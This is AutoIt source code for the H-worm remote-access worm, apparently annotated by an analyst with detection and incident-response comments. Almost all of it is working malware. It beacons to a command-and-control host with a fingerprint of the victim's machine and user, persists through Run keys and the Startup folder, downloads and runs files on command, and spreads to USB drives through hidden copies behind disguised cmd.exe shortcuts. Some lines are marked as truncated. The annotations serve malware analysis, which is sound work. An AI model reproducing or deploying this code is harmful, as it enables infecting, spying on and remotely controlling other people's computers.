- # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- H-WORM UNDER WORLD (AUTOIT VERSION) \
- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- CODER:
- HOUDINI (C) - WWW.DEV-POINT.COM
- COMPILED LANGUAGE:
- AUTOIT V 3.0
- VISIT OWR FOR MORE INFO OR CONTACT ME IN:
- SKYPE: HOUDINI-FX
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- # INCLUDE <PROCESS.AU3>
- # INCLUDE <WINAPI.AU3>
- # INCLUDE <FILE.AU3>
- # NOTRAYICON
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM CONFIG
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- ; Hard-coded command-and-control endpoint. __POST builds every request as http://<host>:<port>/<data>,
- ; so this host:port pair is the beacon destination to look for in proxy/egress logs.
- LOCAL $ IP_ADDR = "127.0.0.1"
- LOCAL $ PORT = "40055"
- ; Install location: the running copy is placed in the user temp directory (see __INIT, __STARTUP).
- LOCAL $ INSTALL_DIR = @ TEMPDIR
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM VARIABLE
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- ; WMI connection to ROOT\CIMV2; queried by __OPERATING_SYSTEM and __SECURITY_CENTER for host fingerprinting.
- LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
- ; Field separator used both in server replies (main loop) and in the outgoing fingerprint (__INFORMATIOM).
- LOCAL $ SPLITTER = "<|>"
- ; Version tag reported to the server; also forms part of the single-instance mutex name (__ONE_INSTANCE).
- LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
- ; Whether this copy was launched from the root of a drive; decided and persisted by __IS_USB_SPREADING.
- LOCAL $ USB_SPREADING = "FALSE"
- ; Most recent server reply, split on $SPLITTER into [command, argument] by the main loop.
- LOCAL $ SERVER_CMD
- ; Mutex handle returned by __ONE_INSTANCE; closed before an UPDATE restart.
- LOCAL $ W_METUX
- ; Components of the running script's own path, filled by _PathSplit in __INIT.
- ; $WZFNAME (file name without extension) is reused as the Run-key value name and as a sub-folder name.
- LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM CODE: START
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- ; Entry point. Exits unless running as a compiled executable, installs itself (__INIT), then loops forever:
- ; spread to removable drives, (re)write persistence, beacon "I_AM_READY" and dispatch the reply.
- ; Detection note: persistence keys are rewritten and the beacon is sent on every 5-second iteration.
- IF NOT @ COMPILED THEN EXIT
- __INIT ()
- WHILE TRUE
- __USB_SPREADING ()
- __STARTUP ()
- ; Reply is upper-cased text; element [1] is the command, [2] its argument (no bounds check on [2]).
- $ SERVER_CMD = __ POST ("I_AM_READY")
- $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
- SELECT
- ; UNINSTALL: undo the USB drops, remove both Run values and the Startup-folder copy, then exit.
- ; IR note: the copy in $INSTALL_DIR and the HKLM\SOFTWARE\<name> key from __IS_USB_SPREADING are NOT removed here.
- CASE $ SERVER_CMD [1] = "UNINSTALL"
- CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
- __USB_SPREADING ($ SERVER_CMD [1])
- REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
- REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
- FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
- EXIT
- ; UPDATE: release the single-instance mutex so the downloaded replacement (started with "/UPDATE") can run, then exit.
- CASE $ SERVER_CMD [1] = "UPDATE"
- CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
- _WINAPI_CLOSEHANDLE ($ W_METUX)
- __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
- EXIT
- ; SEND: download the named file from the server and launch it.
- CASE $ SERVER_CMD [1] = "SEND"
- CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
- __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
- ; EXCECUTE (sic - the server-side command string): fetch a compiled AutoIt script and run it via __RUNA3X.
- CASE $ SERVER_CMD [1] = "EXCECUTE"
- CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
- __RUNA3X ($ SERVER_CMD [2])
- ENDSELECT
- SLEEP (5000)
- WEND
- ; Installation step. If not already running from $INSTALL_DIR, copies itself there, launches that copy and exits;
- ; otherwise enforces single instance and reads the USB-origin flag.
- ; Note: _PathSplit also populates the global $WZ* variables used elsewhere for key and folder names.
- FUNC __ INIT ()
- _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
- IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
- ; "/UPDATE" launch: keep retrying the overwrite (flag 1 = overwrite, 8 = create dir) - presumably until the
- ; previous instance has released the file; no retry limit.
- IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
- DO
- UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
- ELSE
- FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
- ENDIF
- ; Hand over to the installed copy; the original process exits.
- SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
- EXIT
- ENDIF
- __ONE_INSTANCE ()
- __IS_USB_SPREADING ()
- ENDFUNC
- ; Download-and-run. Requests "IS-SENDING<|>$FILE" from the server as a raw stream, writes it to
- ; <script dir>\<$WZFNAME>\<name><ext> (FileOpen 16+2+8 = binary, write, create folder), optionally runs it with $CMD.
- ; Returns the path written. IR note: the <script dir>\<$WZFNAME> sub-folder is where dropped payloads land.
- ; $RESULT is never declared Local, so it is assigned as a global.
- FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
- LOCAL $ FGET_HANDEL
- _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
- $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
- FILEWRITE ($ FGET_HANDEL, $ RESULT)
- FILECLOSE ($ FGET_HANDEL)
- IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
- RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
- ENDFUNC
- ; Runs a server-supplied compiled AutoIt script. Copies the bundled interpreter (@AutoItExe) to
- ; <script dir>\<$WZFNAME>\<name>.EXE, fetches the script bytes and embeds them into that copy as a resource,
- ; then launches it. The DllCall sequence that obtains $H_RESOURCE and writes the resource is truncated in this
- ; paste (lines below are incomplete as shown); only the closing EndUpdateResource call survives intact.
- ; IR note: a fresh copy of AutoIt3.exe with a modified resource section in that sub-folder is the artefact to look for.
- FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
- LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
- LOCAL $ FGET_HANDEL
- _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
- $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
- $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
- DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
- ; --- truncated in the paste: the call(s) filling $H_RESOURCE are missing ---
- $ H_RESOURCE = DLLCALL
- IF $ H_RESOURCE [0] <> 0 THEN
- ; --- truncated in the paste: fragment of the resource-write call ---
- DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
- DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
- SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
- ENDIF
- ENDFUNC
- ; Single C2 transport. Issues a plain HTTP GET to http://<$IP_ADDR>:<$PORT>/<$DATA> (flag 1 = bypass local cache).
- ; Detection note: the host fingerprint from __INFORMATIOM is sent as the HTTP User-Agent header, so a
- ; User-Agent containing "<|>"-separated fields (serial, hostname, user, OS, "H-WORM ...") is a strong network indicator.
- ; $TYPE = "TEXT" returns the upper-cased response string; anything else returns the raw binary.
- FUNC __ POST ($ DATA, $ TYPE = "TEXT")
- LOCAL $ RESULT
- HTTPSETUSERAGENT (__INFORMATIOM ())
- $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
- IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
- RETURN $ RESULT
- ENDFUNC
- ; Persistence. Three locations, re-applied on every main-loop iteration:
- ;   HKLM\...\Run and HKCU\...\Run, value name = $WZFNAME, data = quoted path of the $INSTALL_DIR copy;
- ;   a further copy of the executable in the user's Startup folder (no overwrite flag, so an existing file is kept).
- ; The HKLM write will fail silently without admin rights; the HKCU value and Startup copy still apply.
- FUNC __ STARTUP ()
- REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
- REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
- FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
- ENDFUNC
- ; Builds the host fingerprint that __POST sends as the User-Agent. Fields, "<|>"-separated, in order:
- ;   volume serial of @HomeDrive (8 hex digits), computer name, user name, OS caption, $WORM_VERSION,
- ;   AV and firewall names (two fields from __SECURITY_CENTER), USB-origin flag, foreground window title/process.
- ; (Identifier spelling is the author's; it is referenced from __POST and must stay as-is.)
- FUNC __ INFORMATIOM ()
- LOCAL $ INFORAMTION = ""
- $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
- RETURN $ INFORAMTION
- ENDFUNC
- ; Returns the Caption of the first Win32_OperatingSystem row (via WMI) with a trailing "."; "" if the query yields nothing.
- FUNC __ OPERATING_SYSTEM ()
- LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
- LOCAL $ OS_CAPTION = ""
- FOR $ OS IN $ OPERATINGSYSTEM
- $ OS_CAPTION = $ OS.CAPTION & "."
- EXITLOOP
- NEXT
- RETURN $ OS_CAPTION
- ENDFUNC
- ; Enumerates installed AV and firewall products through WMI Security Center and returns "<av><|><fw>".
- ; Namespace is ROOT\SecurityCenter, or ROOT\SecurityCenter2 when the numeric OS version is above 6.
- ; Each loop appends the running value to itself plus the next displayName, so fields with several products
- ; contain repeated names rather than a clean list. Empty results become "NO AV" / "NO FW".
- ; Detection note: WMI queries against AntiVirusProduct/FirewallProduct from an unexpected process are a useful telemetry signal.
- FUNC __ SECURITY_CENTER ()
- LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
- LOCAL $ OS_VERSION
- LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
- FOR $ OS IN $ OPERATINGSYSTEM
- $ OS_VERSION = NUMBER ($ OS.VERSION)
- NEXT
- IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
- ; Not declared Local: assigned as a global.
- $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
- LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
- LOCAL $ ANTI_VIRUSE = ""
- LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
- LOCAL $ FIRE_WALL = ""
- FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
- $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
- NEXT
- FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
- $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
- NEXT
- IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
- IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
- RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
- ENDFUNC
- ; Returns "<foreground window title>- [<owning process name>]"; reported to the server with every beacon,
- ; so the operator sees what the user is currently working in.
- FUNC __ TOP_WINDOWS ()
- LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
- LOCAL $ WINTOP_PID, $ WINTOP_PNAME
- _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
- $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
- RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
- ENDFUNC
- ; Single-instance guard. Creates a named mutex "<$WZFNAME>_<$WORM_VERSION>" and exits if creation fails or
- ; the mutex already exists (GetLastError 183 = ERROR_ALREADY_EXISTS). Handle is kept in $W_METUX.
- ; Detection note: a mutex whose name ends in "_H-WORM (AUTOIT)" is a host-based indicator.
- FUNC __ ONE_INSTANCE ()
- $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
- IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
- ENDFUNC
- ; Walks every removable drive that reports READY and hands its root to __IFOLDERS with $TYPE
- ; ("INSTALL" to drop copies, "UNINSTALL" to remove them). Returns early if no removable drive exists.
- ; $DISK is not declared Local (global assignment).
- FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
- $ DISK = DRIVEGETDRIVE ("REMOVABLE")
- IF NOT ISARRAY ($ DISK) THEN RETURN
- FOR $ I = 1 TO $ DISK [0] STEP 1
- IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
- NEXT
- ENDFUNC
- ; Records whether this infection arrived via removable media. Reads the default value of
- ; HKLM\SOFTWARE\<script name without extension>; if unset, marks "TRUE" when the executable sits directly in a
- ; drive root ("X:\<scriptname>") and persists the result. The flag is then reported in every beacon.
- ; IR note: this custom HKLM\SOFTWARE key is left behind by UNINSTALL.
- FUNC __ IS_USB_SPREADING ()
- LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
- $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
- IF $ USB_SPREADING = "" THEN
- $ USB_SPREADING = "FALSE"
- IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
- REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
- ENDIF
- ENDFUNC
- ; Breadth-first directory walk that invokes $CALLBACK(path, $TYPE) for every entry found.
- ; $ENUM_ARRAY is the work queue ($G_COUNTER = next directory to list, $L_COUNTER = entries queued).
- ; With the default $FIRST = TRUE the loop exits after listing $ROOT, so only the top level of a drive is touched.
- ; Returns the accumulated path array.
- FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
- LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
- LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
- $ ENUM_ARRAY [0] = $ ROOT
- DO
- $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
- DO
- $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
- IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
- ; Every entry is queued (files included); the callback is invoked while the search handle is still open.
- REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
- $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
- CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
- $ L_COUNTER + = 1
- ENDIF
- UNTIL @ ERROR OR $ FIND_NAME = ""
- FILECLOSE ($ H_SEARCH)
- IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
- $ G_COUNTER + = 1
- UNTIL $ G_COUNTER> $ L_COUNTER
- RETURN $ ENUM_ARRAY
- ENDFUNC
- ; Per-entry handler for the removable-drive walk.
- ; INSTALL: skips .lnk files and its own name; drops a hidden+system copy of itself next to the entry; replaces the
- ;   visible entry with a <name>.lnk that runs cmd.exe (@ComSpec) to start the worm copy AND the original item, using the
- ;   original's DefaultIcon from HKLM\SOFTWARE\Classes (folder icon for directories); then hides the original (+HS).
- ; UNINSTALL: deletes the .lnk files and worm copies and clears the hidden/system attributes.
- ; IR note: hidden+system files next to same-named .lnk shortcuts pointing at cmd.exe on a USB stick are the tell-tale layout.
- ; The StringReplace pattern on the $ARGU line appears to have lost characters in this paste - do not rely on it verbatim.
- FUNC __ CALLBACK ($ PATH, $ TYPE)
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
- _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- IF $ TYPE = "INSTALL" THEN
- IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
- FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
- FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
- $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
- ; Icon lookup: files go through the extension's ProgID -> DefaultIcon; directories use the Folder DefaultIcon.
- IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
- $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
- ELSE
- $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
- ENDIF
- ; "path,index" icon strings become a two-element array; "%1" means "use the file itself" as the icon source.
- $ SZICON = STRINGSPLIT ($ SZICON, ",")
- IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
- IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
- IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
- FILESETATTRIB ($ PATH, "+ HS")
- ENDIF
- IF $ TYPE = "UNINSTALL" THEN
- IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
- FILESETATTRIB ($ PATH, "-HS")
- ENDIF
- ENDFUNC
- ; Thin wrapper over kernel32 CreateMutexW. Returns the mutex handle, or 0 with @error set to 1 when the call
- ; fails or yields a NULL handle. $TSECURITY defaults to 0 (no security attributes); $FINITIAL = 1 requests initial ownership.
- FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
- LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
- IF (@ ERROR) OR (NOT $ RET [0]) THEN
- RETURN SETERROR (1, 0, 0)
- ENDIF
- RETURN $ RET [0]
- ENDFUNC